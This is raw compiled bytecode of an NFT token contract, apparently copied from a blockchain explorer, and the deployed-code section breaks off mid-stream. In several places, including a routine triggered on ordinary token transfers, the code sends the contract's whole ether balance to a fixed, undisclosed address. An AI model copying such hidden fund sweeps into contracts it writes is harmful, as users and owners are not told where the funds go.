22a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610aaf573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109e3576109de848484611509565b610abb565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610a2c929190612c60565b602060405180830381865afa158015610a49573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a6d9190612c9e565b610aae57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610aa591906125a8565b60405180910390fd5b5b610aba848484611509565b5b50505050565b60008060006103e8603285610ad69190612cfa565b610ae09190612d6b565b9050600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168192509250509250929050565b600a5481610b1e61095a565b610b289190612d9c565b1115610b3357600080fd5b610b3c81611833565b50565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b9957600080fd5b81600c8190555080600a819055505050565b6000471115610c1057730eb68df8b7102d628a2a880d765b1e6f46e5ebb973ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610c0e573d6000803e3d6000fd5b505b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610c6e57600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610cb4573d6000803e3d6000fd5b50565b6daaeb6d7670e522a718067333cd4e81565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610e07573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d3b57610d3684848461198e565b610e13565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610d84929190612c60565b602060405180830381865afa158015610da1573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610dc59190612c9e565b610e0657336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610dfd91906125a8565b60405180910390fd5b5b610e1284848461198e565b5b50505050565b600c5481565b6000610e2a826119ae565b9050919050565b600b5481565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e9e576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610f24906129bb565b80601f0160208091040260200160405190810160405280929190818152602001828054610f50906129bb565b8015610f9d5780601f10610f7257610100808354040283529160200191610f9d565b820191906000526020600020905b815481529060010190602001808311610f8057829003601f168201915b5050505050905090565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156110a2576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b815260040161101f929190612c60565b602060405180830381865afa15801561103c573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906110609190612c9e565b6110a157806040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161109891906125a8565b60405180910390fd5b5b6110ac8383611a7a565b505050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156111f0573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036111245761111f85858585611b85565b6111fd565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b815260040161116d929190612c60565b602060405180830381865afa15801561118a573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111ae9190612c9e565b6111ef57336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016111e691906125a8565b60405180910390fd5b5b6111fc85858585611b85565b5b5050505050565b600d5481565b6060600961121783611bf8565b604051602001611228929190612edb565b6040516020818303038152906040529050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461129857600080fd5b600a54816112a461095a565b6112ae9190612d9c565b11156112b957600080fd5b6112c38282611c48565b5050565b600a5481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b60008161136c611504565b1115801561137b575060005482105b80156113b9575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b60006113cb82610e1f565b90508073ffffffffffffffffffffffffffffffffffffffff166113ec611c66565b73ffffffffffffffffffffffffffffffffffffffff161461144f5761141881611413611c66565b6112cd565b61144e576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b611511611c6e565b600061151c826119ae565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614611583576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061158f84611cda565b915091506115a581876115a0611c66565b611d01565b6115f1576115ba866115b5611c66565b6112cd565b6115f0576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1603611657576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6116648686866001611d45565b801561166f57600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001019190508190555061173d85611719888887611d4b565b7c020000000000000000000000000000000000000000000000000000000017611d73565b600460008681526020019081526020016000208190555060007c02000000000000000000000000000000000000000000000000000000008416036117c357600060018501905060006004600083815260200190815260200160002054036117c15760005481146117c0578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a461182b8686866001611d9e565b505050505050565b60003403611966576001811461184857600080fd5b6005600a546118579190612d6b565b61185f61095a565b11156119565761186d611e1c565b600f6000438152602001908152602001600020541080156118ce5750600c54600e60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b6118d757600080fd5b600e60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081548092919061192790612f0a565b9190505550600f6000438152602001908152602001600020600081548092919061195090612f0a565b91905055505b611961336001611c48565b61198b565b80600b546119749190612cfa565b34101561198057600080fd5b61198a3382611c48565b5b50565b6119a9838383604051806020016040528060008152506110b1565b505050565b600080829050806119bd611504565b11611a4357600054811015611a425760006004600083815260200190815260200160002054905060007c0100000000000000000000000000000000000000000000000000000000821603611a40575b60008103611a36576004600083600190039350838152602001908152602001600020549050611a0c565b8092505050611a75565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b8060076000611a87611c66565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611b34611c66565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611b7991906122b9565b60405180910390a35050565b611b90848484610971565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611bf257611bbb84848484611e44565b611bf1576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b50505050565b606060a060405101806040526020810391506000825281835b600115611c3357600184039350600a81066030018453600a8104905080611c11575b50828103602084039350808452505050919050565b611c62828260405180602001604052806000815250611f94565b5050565b600033905090565b6000471115611cd757730eb68df8b7102d628a2a880d765b1e6f46e5ebb973ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611cd1573d6000803e3d6000fd5b50611cd8565b5b565b60008060006006600085815260200190815260200160002090508092508254915050915091565b600073ffffffffffffffffffffffffffffffffffffffff8316925073ffffffffffffffffffffffffffffffffffffffff821691508382148383141790509392505050565b50505050565b60008060e883901c905060e8611d62868684612031565b62ffffff16901b9150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff83169250814260a01b178317905092915050565b6103e76001611dab61095a565b611db59190612d9c565b10611e1657730eb68df8b7102d628a2a880d765b1e6f46e5ebb973ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611e14573d6000803e3d6000fd5b505b50505050565b6000600c611e2861095a565b600a54611e359190612f52565b611e3f9190612d6b565b905090565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a02611e6a611c66565b8786866040518563ffffffff1660e01b8152600401611e8c9493929190612fdb565b6020604051808303816000875af1925050508015611ec857506040513d601f19601f82011682018060405250810190611ec5919061303c565b60015b611f41573d8060008114611ef8576040519150601f19603f3d011682016040523d82523d6000602084013e611efd565b606091505b506000815103611f39576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b611f9e838361203a565b60008373ffffffffffffffffffffffffffffffffffffffff163b1461202c57600080549050600083820390505b611fde6000868380600101945086611e44565b612014576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b818110611fcb57816000541461202957600080fd5b50505b505050565b60009392505050565b6000805490506000820361207a576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6120876000848385611d45565b600160406001901b178202600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055506120fe836120ef6000866000611d4b565b6120f8856121f5565b17611d73565b6004600083815260200190815260200160002081905550600080838301905073ffffffffffffffffffffffffffffffffffffffff85169150828260007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600183015b81811461219f57808360007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600181019050612164565b50600082036121da576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8060008190555050506121f06000848385611d9e565b505050565b60006001821460e11b9050919050565b6000604051905090565b600080fd5b600080fd5b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b61224e81612219565b811461225957600080fd5b50565b60008135905061226b81612245565b92915050565b6000602082840312156122875761228661220f565b5b60006122958482850161225c565b91505092915050565b60008115159050919050565b6122b38161229e565b82525050565b60006020820190506122ce60008301846122aa565b92915050565b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b612327826122de565b810181811067ffffffffffffffff82111715612346576123456122ef565b5b80604052505050565b6000612359612205565b9050612365828261231e565b919050565b600067ffffffffffffffff821115612385576123846122ef565b5b61238e826122de565b9050602081019050919050565b82818337600083830152505050565b60006123bd6123b88461236a565b61234f565b9050828152602081018484840111156123d9576123d86122d9565b5b6123e484828561239b565b509392505050565b600082601f830112612401576124006122d4565b5b81356124118482602086016123aa565b91505092915050565b6000602082840312156124305761242f61220f565b5b600082013567ffffffffffffffff81111561244e5761244d612214565b5b61245a848285016123ec565b91505092915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561249d578082015181840152602081019050612482565b60008484015250505050565b60006124b482612463565b6124be818561246e565b93506124ce81856020860161247f565b6124d7816122de565b840191505092915050565b600060208201905081810360008301526124fc81846124a9565b905092915050565b6000819050919050565b61251781612504565b811461252257600080fd5b50565b6000813590506125348161250e565b92915050565b6000602082840312156125505761254f61220f565b5b600061255e84828501612525565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061259282612567565b9050919050565b6125a281612587565b82525050565b60006020820190506125bd6000830184612599565b92915050565b6125cc81612587565b81146125d757600080fd5b50565b6000813590506125e9816125c3565b92915050565b600080604083850312156126065761260561220f565b5b6000612614858286016125da565b925050602061262585828601612525565b9150509250929050565b61263881612504565b82525050565b6000602082019050612653600083018461262f565b92915050565b6000806000606084860312156126725761267161220f565b5b6000612680868287016125da565b9350506020612691868287016125da565b92505060406126a286828701612525565b9150509250925092565b600080604083850312156126c3576126c261220f565b5b60006126d185828601612525565b92505060206126e285828601612525565b9150509250929050565b60006040820190506127016000830185612599565b61270e602083018461262f565b9392505050565b6000806040838503121561272c5761272b61220f565b5b600061273a858286016125da565b925050602061274b858286016125da565b9150509250929050565b6000819050919050565b600061277a61277561277084612567565b612755565b612567565b9050919050565b600061278c8261275f565b9050919050565b600061279e82612781565b9050919050565b6127ae81612793565b82525050565b60006020820190506127c960008301846127a5565b92915050565b6000602082840312156127e5576127e461220f565b5b60006127f3848285016125da565b91505092915050565b6128058161229e565b811461281057600080fd5b50565b600081359050612822816127fc565b92915050565b6000806040838503121561283f5761283e61220f565b5b600061284d858286016125da565b925050602061285e85828601612813565b9150509250929050565b600067ffffffffffffffff821115612883576128826122ef565b5b61288c826122de565b9050602081019050919050565b60006128ac6128a784612868565b61234f565b9050828152602081018484840111156128c8576128c76122d9565b5b6128d384828561239b565b509392505050565b600082601f8301126128f0576128ef6122d4565b5b8135612900848260208601612899565b91505092915050565b600080600080608085870312156129235761292261220f565b5b6000612931878288016125da565b9450506020612942878288016125da565b935050604061295387828801612525565b925050606085013567ffffffffffffffff81111561297457612973612214565b5b612980878288016128db565b91505092959194509250565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806129d357607f821691505b6020821081036129e6576129e561298c565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302612a4e7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82612a11565b612a588683612a11565b95508019841693508086168417925050509392505050565b6000612a8b612a86612a8184612504565b612755565b612504565b9050919050565b6000819050919050565b612aa583612a70565b612ab9612ab182612a92565b848454612a1e565b825550505050565b600090565b612ace612ac1565b612ad9818484612a9c565b505050565b5b81811015612afd57612af2600082612ac6565b600181019050612adf565b5050565b601f821115612b4257612b13816129ec565b612b1c84612a01565b81016020851015612b2b578190505b612b3f612b3785612a01565b830182612ade565b50505b505050565b600082821c905092915050565b6000612b6560001984600802612b47565b1980831691505092915050565b6000612b7e8383612b54565b9150826002028217905092915050565b612b9782612463565b67ffffffffffffffff811115612bb057612baf6122ef565b5b612bba82546129bb565b612bc5828285612b01565b600060209050601f831160018114612bf85760008415612be6578287015190505b612bf08582612b72565b865550612c58565b601f198416612c06866129ec565b60005b82811015612c2e57848901518255600182019150602085019450602081019050612c09565b86831015612c4b5784890151612c47601f891682612b54565b8355505b6001600288020188555050505b505050505050565b6000604082019050612c756000830185612599565b612c826020830184612599565b9392505050565b600081519050612c98816127fc565b92915050565b600060208284031215612cb457612cb361220f565b5b6000612cc284828501612c89565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000612d0582612504565b9150612d1083612504565b9250828202612d1e81612504565b91508282048414831517612d3557612d34612ccb565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000612d7682612504565b9150612d8183612504565b925082612d9157612d90612d3c565b5b828204905092915050565b6000612da782612504565b9150612db283612504565b9250828201905080821115612dca57612dc9612ccb565b5b92915050565b600081905092915050565b60008154612de8816129bb565b612df28186612dd0565b94506001821660008114612e0d5760018114612e2257612e55565b60ff1983168652811515820286019350612e55565b612e2b856129ec565b60005b83811015612e4d57815481890152600182019150602081019050612e2e565b838801955050505b50505092915050565b6000612e6982612463565b612e738185612dd0565b9350612e8381856020860161247f565b80840191505092915050565b7f2e6a736f6e000000000000000000000000000000000000000000000000000000600082015250565b6000612ec5600583612dd0565b9150612ed082612e8f565b600582019050919050565b6000612ee78285612ddb565b9150612ef38284612e5e565b9150612efe82612eb8565b91508190509392505050565b6000612f1582612504565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203612f4757612f46612ccb565b5b600182019050919050565b6000612f5d82612504565b9150612f6883612504565b9250828203905081811115612f8057612f7f612ccb565b5b92915050565b600081519050919050565b600082825260208201905092915050565b6000612fad82612f86565b612fb78185612f91565b9350612fc781856020860161247f565b612fd0816122de565b840191505092915050565b6000608082019050612ff06000830187612599565b612ffd6020830186612599565b61300a604083018561262f565b818103606083015261301c8184612fa2565b905095945050505050565b60008151905061303681612245565b92915050565b6000602082840312156130525761305161220f565b5b600061306084828501613027565b9150509291505056fea26469706673582212206e14280120aa5a6aadd4d391ee2deee4d44d001e1ab17913d24eb9576667bca564736f6c63430008110033697066733a2f2f62616679626569626b6b63727375656361667235336563346370737567686f736d6d6235616c686532336866686a656c3677356c6b65676571676d2f

Deployed Bytecode

0x60806040526004361061019c5760003560e01c806342842e0e116100ec578063a22cb4651161008a578063c87b56dd11610064578063c87b56dd14610572578063cc47a40b146105af578063d5abeb01146105d8578063e985e9c5146106035761019c565b8063a22cb46514610502578063b88d4fde1461052b578063bc951b91146105475761019c565b80636817c76c116100c65780636817c76c1461044457806370a082311461046f5780638da5cb5b146104ac57806395d89b41146104d75761019c565b806342842e0e146103c0578063604906dc146103dc5780636352211e146104075761019c565b806323b872dd1161015957806338b08fd41161013357806338b08fd41461032c5780633a233f89146103555780633ccfd60b1461037e57806341f43434146103955761019c565b806323b872dd146102b65780632a55205a146102d25780632db11544146103105761019c565b806301ffc9a7146101a1578063028043b1146101de57806306fdde0314610207578063081812fc14610232578063095ea7b31461026f57806318160ddd1461028b575b600080fd5b3480156101ad57600080fd5b506101c860048036038101906101c39190612271565b610640565b6040516101d591906122b9565b60405180910390f35b3480156101ea57600080fd5b506102056004803603810190610200919061241a565b6106d2565b005b34801561021357600080fd5b5061021c61073f565b60405161022991906124e2565b60405180910390f35b34801561023e57600080fd5b506102596004803603810190610254919061253a565b6107d1565b60405161026691906125a8565b60405180910390f35b610289600480360381019061028491906125ef565b610850565b005b34801561029757600080fd5b506102a061095a565b6040516102ad919061263e565b60405180910390f35b6102d060048036038101906102cb9190612659565b610971565b005b3480156102de57600080fd5b506102f960048036038101906102f491906126ac565b610ac1565b6040516103079291906126ec565b60405180910390f35b61032a6004803603810190610325919061253a565b610b12565b005b34801561033857600080fd5b50610353600480360381019061034e91906126ac565b610b3f565b005b34801561036157600080fd5b5061037c60048036038101906103779190612715565b610bab565b005b34801561038a57600080fd5b50610393610c14565b005b3480156103a157600080fd5b506103aa610cb7565b6040516103b791906127b4565b60405180910390f35b6103da60048036038101906103d59190612659565b610cc9565b005b3480156103e857600080fd5b506103f1610e19565b6040516103fe919061263e565b60405180910390f35b34801561041357600080fd5b5061042e6004803603810190610429919061253a565b610e1f565b60405161043b91906125a8565b60405180910390f35b34801561045057600080fd5b50610459610e31565b604051610466919061263e565b60405180910390f35b34801561047b57600080fd5b50610496600480360381019061049191906127cf565b610e37565b6040516104a3919061263e565b60405180910390f35b3480156104b857600080fd5b506104c1610eef565b6040516104ce91906125a8565b60405180910390f35b3480156104e357600080fd5b506104ec610f15565b6040516104f991906124e2565b60405180910390f35b34801561050e57600080fd5b5061052960048036038101906105249190612828565b610fa7565b005b61054560048036038101906105409190612909565b6110b1565b005b34801561055357600080fd5b5061055c611204565b604051610569919061263e565b60405180910390f35b34801561057e57600080fd5b506105996004803603810190610594919061253a565b61120a565b6040516105a691906124e2565b60405180910390f35b3480156105bb57600080fd5b506105d660048036038101906105d191906125ef565b61123e565b005b3480156105e457600080fd5b506105ed6112c7565b6040516105fa919061263e565b60405180910390f35b34801561060f57600080fd5b5061062a60048036038101906106259190612715565b6112cd565b60405161063791906122b9565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061069b57506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806106cb5750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461072c57600080fd5b806009908161073b9190612b8e565b5050565b60606002805461074e906129bb565b80601f016020809104026020016040519081016040528092919081815260200182805461077a906129bb565b80156107c75780601f1061079c576101008083540402835291602001916107c7565b820191906000526020600020905b8154815290600101906020018083116107aa57829003601f168201915b5050505050905090565b60006107dc82611361565b610812576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561094b576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b81526004016108c8929190612c60565b602060405180830381865afa1580156108e5573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109099190612c9e565b61094a57806040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161094191906125a8565b60405180910390fd5b5b61095583836113c0565b505050565b6000610964611504565b6001546000540303905090565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610aaf573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109e3576109de848484611509565b610abb565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610a2c929190612c60565b602060405180830381865afa158015610a49573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a6d9190612c9e565b610aae57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610aa591906125a8565b60405180910390fd5b5b610aba848484611509565b5b50505050565b60008060006103e8603285610ad69190612cfa565b610ae09190612d6b565b9050600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168192509250509250929050565b600a5481610b1e61095a565b610b289190612d9c565b1115610b3357600080fd5b610b3c81611833565b50565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b9957600080fd5b81600c8190555080600a819055505050565b6000471115610c1057730eb68df8b7102d628a2a880d765b1e6f46e5ebb973ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610c0e573d6000803e3d6000fd5b505b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610c6e57600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610cb4573d6000803e3d6000fd5b50565b6daaeb6d7670e522a718067333cd4e81565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610e07573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d3b57610d3684848461198e565b610e13565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610d84929190612c60565b602060405180830381865afa158015610da1573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610dc59190612c9e565b610e0657336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610dfd91906125a8565b60405180910390fd5b5b610e1284848461198e565b5b50505050565b600c5481565b6000610e2a826119ae565b9050919050565b600b5481565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e9e576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610f24906129bb565b80601f0160208091040260200160405190810160405280929190818152602001828054610f50906129bb565b8015610f9d5780601f10610f7257610100808354040283529160200191610f9d565b820191906000526020600020905b815481529060010190602001808311610f8057829003601f168201915b5050505050905090565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156110a2576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b815260040161101f929190612c60565b602060405180830381865afa15801561103c573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906110609190612c9e565b6110a157806040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161109891906125a8565b60405180910390fd5b5b6110ac8383611a7a565b505050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156111f0573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036111245761111f85858585611b85565b6111fd565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b815260040161116d929190612c60565b602060405180830381865afa15801561118a573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111ae9190612c9e565b6111ef57336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016111e691906125a8565b60405180910390fd5b5b6111fc85858585611b85565b5b5050505050565b600d5481565b6060600961121783611bf8565b604051602001611228929190612edb565b6040516020818303038152906040529050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461129857600080fd5b600a54816112a461095a565b6112ae9190612d9c565b11156112b957600080fd5b6112c38282611c48565b5050565b600a5481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b60008161136c611504565b1115801561137b575060005482105b80156113b9575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b60006113cb82610e1f565b90508073ffffffffffffffffffffffffffffffffffffffff166113ec611c66565b73ffffffffffffffffffffffffffffffffffffffff161461144f5761141881611413611c66565b6112cd565b61144e576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b611511611c6e565b600061151c826119ae565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614611583576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061158f84611cda565b915091506115a581876115a0611c66565b611d01565b6115f1576115ba866115b5611c66565b6112cd565b6115f0576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1603611657576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6116648686866001611d45565b801561166f57600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001019190508190555061173d85611719888887611d4b565b7c020000000000000000000000000000000000000000000000000000000017611d73565b600460008681526020019081526020016000208190555060007c02000000000000000000000000000000000000000000000000000000008416036117c357600060018501905060006004600083815260200190815260200160002054036117c15760005481146117c0578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a461182b8686866001611d9e565b505050505050565b60003403611966576001811461184857600080fd5b6005600a546118579190612d6b565b61185f61095a565b11156119565761186d611e1c565b600f6000438152602001908152602001600020541080156118ce5750600c54600e60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b6118d757600080fd5b600e60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081548092919061192790